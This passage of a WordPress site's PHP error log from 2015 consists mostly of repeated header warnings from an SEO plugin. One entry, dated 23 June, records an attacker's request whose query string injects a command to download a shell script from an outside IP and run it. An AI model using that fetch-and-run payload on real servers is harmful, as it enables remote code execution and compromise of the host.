/home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 952 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 958 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 961 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 962 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 963 [10-May-2015 09:32:11] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 964 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 947 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 952 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 958 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 961 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 962 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 963 [11-May-2015 07:03:46] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 964 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 947 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 952 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 958 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 961 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 962 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 963 [14-May-2015 02:41:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 964 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 947 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 952 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 958 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 961 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 962 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 963 [30-May-2015 19:59:29] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 964 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 947 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 952 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 958 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 961 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 962 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 963 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 964 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 947 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 952 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 958 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 961 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 962 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 963 [31-May-2015 15:19:58] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1476) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 964 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 947 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 952 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 958 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 961 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 962 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 963 [11-Jun-2015 21:09:22] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 964 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 947 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 952 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 958 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 961 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 962 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 963 [12-Jun-2015 11:31:10] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 964 [23-Jun-2015 01:20:17] PHP Warning: parse_url(/wp-content/themes/rfx/index.php?cx=cd%20/var/tmp;curl%20-O%20http://212.48.75.38/pq4.sh;sh%20pq4.sh?cx=cd%20/var/tmp;curl%20-O%20http://212.48.75.38/pq4.sh;sh%20pq4.sh) [<a href='function.parse-url'>function.parse-url</a>]: Unable to parse URL in /home/dnwebmak/public_html/wp-content/plugins/better-wp-security/modules/free/hide-backend/class-itsec-hide-backend.php on line 165 [23-Jun-2015 01:20:17] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/better-wp-security/modules/free/hide-backend/class-itsec-hide-backend.php:165) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 1196 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 947 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 948 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 949 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 950 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 951 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 952 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 955 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 956 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 957 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 958 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 961 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at /home/dnwebmak/public_html/wp-content/plugins/all-in-one-seo-pack/aioseop_class.php:1513) in /home/dnwebmak/public_html/wp-includes/pluggable.php on line 962 [28-Jun-2015 01:37:07] PHP Warning: Cannot modify header information - headers already sent by (output started at 